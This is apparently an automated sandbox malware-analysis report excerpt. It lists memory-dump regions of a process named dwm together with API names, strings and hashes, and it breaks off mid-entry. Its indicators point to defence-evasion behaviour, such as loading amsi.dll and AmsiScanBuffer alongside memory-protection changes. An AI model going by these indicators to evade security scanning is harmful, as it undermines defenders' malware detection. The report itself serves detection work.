                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 723a3a8ccdbd693f352db1ebdb64092767e7ae56dcd19bed17b5c447b8d32557
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: 8B016D61700B4086EB10EB22A85835973B1F788FC0FA84434DE9D43B54DF7CCA9AC761
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 5e7d2506bc9458f767f75fb30931a2999dc425b9a3afebb7208a4b32c288ee17
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: 76012D21704B4096EB64EB52A89835973B1F798FC0FA84035DE9D47B58DF3CC589C761
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 761de77342e0a94ec601f240c61f51920176bd37b2ed316876ae5e8853eba589
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: AE010CA5611B4082FB24AB25E84C71A73B0BB59B45F240528DACD077A4FF3EC558C766
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 392d63d54875a93460372a60c02581be9458fcb3ef55fb9cda753c82608c2e14
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: AD012D65311B4092FB74ABA1E84C71573B0BB59B45F240028CACD06B69EF3DC688C722
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 75424da5193fec2bc580ef6704e44c067a8ded6da23e8cd08b40ddfe050d8d1b
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 19F0C26230468492EB20AF20F8C8359B371F784B98FD44025CACD43994EF7DCB99CB21
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 6314c51c4bbb33e11e40deb5b93baf5270c20fed3389cabecbb00c950c42303b
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 53F04F62304685E2EB709B61F5C83597371F754B88F944025DA8947D58EF6CC69CCB21
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: a4ee5c83b7c3e31b22992ad886de9ab76a7927c02ef48da9e3796cfe319312cb
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: D8F082A4304B8081EE049B53BD18119B370BB88FC1F649430EE8E07B18DF6CC556C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: 9cc1e1c6918ab2aa30d497d87bc35be6ce217cec7ee660061e8dc256c73a9c8d
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: 60F0906131160191EA109B64A8883697330EB89760F680A19DAFE475E4DF2DC958C326
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: 1c85e2c862546d5d4a91e20a9f2957db8ad97bff34855c1c7d7a2c78379b7fac
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: 95F08264304B80A1EA649B13B91811AB371BB58FC0F688130EE8A47F18CF6CC589C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: 286da797a1bfe9eecbf103d18c79398e36d186b9545bd24d432004cb9dc54d8f
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 56D06710A51A01F5EA6DBB51EC5C3583372AB74B81FE40419C58A45AA4DF2C89DEC362
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction ID: 6530acc4772a8d12f6973325de470be2d0dea751e69314b5dacff1c02cbfc329
                                                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction Fuzzy Hash: 4902B432259B8496EBB0DB55F49835AB7B0F384794F204016EACE87BA8DF7DC494CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: c7b2fc1b66fd09e5e4ea1d3a806477ad2240914a5d858d9160325d174c5f3b40
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: 26519F3631465187E764DF1AF848A6AB3B5F788B84F604119DE8E43B98EF3ACD05CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: ca187cd21d7f5f7b56b9816f640356e19585e2d4e68a0157b3e8146337f20523
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: 7751B335314651A7E7B8DF2AE84862AB3F5F388B84F604119DE8A43F55DF38C945CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 9064501d9207191e0a03e88cf4adaad404ffb1d761ed384ef498a641ed770bed
                                                          • Instruction ID: 5d59b2b0103d7afae379df0fa74fc5c98ef46df26fa5efd1de3b985bc28ac734
                                                          • Opcode Fuzzy Hash: 9064501d9207191e0a03e88cf4adaad404ffb1d761ed384ef498a641ed770bed
                                                          • Instruction Fuzzy Hash: 4F61AA36529A44C7E7609F15E85831EB7B0F388794F204525FACD47BA8EB7EC940CB26
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction ID: 7ed8a6c2aec3008d9a0ccda01c3aeb7883eca110a2eac85899d85163b797e3db
                                                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction Fuzzy Hash: 4F619536669A44D7EBB09B55E46831AB7B0F388744F200126EACD47FA8DB7DC544CB22
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: 77ad2b19e7a2230ec0cb9af4e572aef01a321567f89bdc863c920986bb1bd4b3
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: 59115436605740E3EB74AF61E40825A77B0FB54B80F14012ADE8D03B98EF7DCA99C795
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002BAAEDA28DF), ref: 000002BAAEDA2A12
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ConsoleMode
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
